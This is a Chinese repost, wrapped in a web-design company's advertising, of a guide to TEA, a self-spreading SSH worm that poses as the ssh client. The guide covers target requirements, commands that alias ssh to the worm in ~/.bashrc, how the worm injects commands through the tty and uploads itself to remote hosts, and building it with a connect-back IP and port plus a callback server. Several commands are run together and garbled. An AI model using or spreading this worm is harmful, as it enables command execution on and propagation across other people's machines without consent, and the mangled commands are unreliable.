TEA是什么

這篇文章給大家分享的是有關(guān)TEA是什么的內(nèi)容。小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過來看看吧。

我們提供的服務(wù)有：做網(wǎng)站、網(wǎng)站制作、微信公眾號(hào)開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、易門ssl等。為成百上千企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù)，是有科學(xué)管理、有技術(shù)的易門網(wǎng)站制作公司

TEA是一款基于TAS框架的SSH客戶端蠕蟲，從本質(zhì)上說，它是一個(gè)仿冒的SSH客戶端，它能夠修改tty輸入/輸出來實(shí)現(xiàn)任意命令執(zhí)行，或通過SSH連接來上傳自身以實(shí)現(xiàn)滲透感染。

為了實(shí)現(xiàn)該工具的正常功能，遠(yuǎn)程主機(jī)需要滿足以下條件：

1、在登錄時(shí)顯示“Last login”信息；

2、dd和stty；

3、目標(biāo)用戶使用Bash作為默認(rèn)Shell；

4、可運(yùn)行fakessh代碼；

5、~/.bashrc可寫入；

感染本地主機(jī)：

mkdir ~/.sshwormcp ssh ~/.sshwormalias ssh='~/.sshworm/ssh'

我們首次執(zhí)行fakessh時(shí)，并不會(huì)顯示任何內(nèi)容，工具會(huì)執(zhí)行post-install.c中的代碼，并將字符串a(chǎn)lias ssh="~/.sshworm/ssh"寫入到~/.bashrc中：

$ ssh$ sshusage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface][-b bind_address] [-c cipher_spec] [-D [bind_address:]port][-E log_file] [-e escape_char] [-F configfile] [-I pkcs11][-i identity_file] [-J [user@]host[:port]] [-L address][-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port][-Q query_option] [-R address] [-S ctl_path] [-W host:port][-w local_tun[:remote_tun]] destination [command]

實(shí)現(xiàn)傳播和感染

我們只需要連接到目標(biāo)SSH服務(wù)器，并且服務(wù)器滿足TEA運(yùn)行條件的話，目標(biāo)設(shè)備以及連接至目標(biāo)設(shè)備的主機(jī)就可以成功被感染。

tty修改：

Fakessh執(zhí)行之后，它將會(huì)等到字符串“Last login”來開啟I/O修改（output-hooks.c），當(dāng)接收到“Last login”之后，它將會(huì)發(fā)送一些任意指令（inject-cmd.c），然后等待命令執(zhí)行的結(jié)果（output-hooks.c）。如果遠(yuǎn)程設(shè)備中不存在文件~/.sshworm/ssh的話，蠕蟲將會(huì)上傳自身（upload.c）。

卸載：

$ rm -rf ~/.sshworm$ perl -i -pe 's;alias ssh="~/.sshworm/ssh";;g' ~/.bashrc$ unalias ssh

編譯

我建議大家使用musl-libc，或其他的libc，但我不建議大家使用glibc，因?yàn)槭褂胓libc編譯的代碼會(huì)非常大。

獲取源碼：

$ git clone --recurse-submodules https://github.com/hc0d3r/tea

構(gòu)建選項(xiàng)：

名稱	介紹
IP	遠(yuǎn)程IPv4 連接
PORT	遠(yuǎn)程port 連接

樣例：

$ make CC=musl-gcc IP=my-ipv4 PORT=1234

服務(wù)器

這里我們制作了一個(gè)簡(jiǎn)單的服務(wù)器來處理鏈接，當(dāng)post-install.c的代碼被執(zhí)行之后，服務(wù)器將會(huì)接收到鏈接。服務(wù)器機(jī)制非常簡(jiǎn)單，當(dāng)新鏈接建立成功之后，它將會(huì)執(zhí)行一條新的命令并通過命令行傳遞鏈接文件描述符，這樣才能保證執(zhí)行的程序能夠處理鏈接。

編譯：

$ cd server$ makecc -Wall -Wextra -O3 -c net.c -o net.occ -Wall -Wextra -O3 -c replace.c -o replace.occ -Wall -Wextra -O3 -c term.c -o term.occ -Wall -Wextra -O3 -c main.c -o main.occ -Wall -Wextra -O3 -o server net.o replace.o term.o main.o

工具演示

感謝各位的閱讀！關(guān)于“TEA是什么”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！

當(dāng)前題目：TEA是什么
分享地址：http://muchs.cn/article40/ighcho.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供用戶體驗(yàn)、網(wǎng)站制作、App開發(fā)、關(guān)鍵詞優(yōu)化、網(wǎng)站策劃、移動(dòng)網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)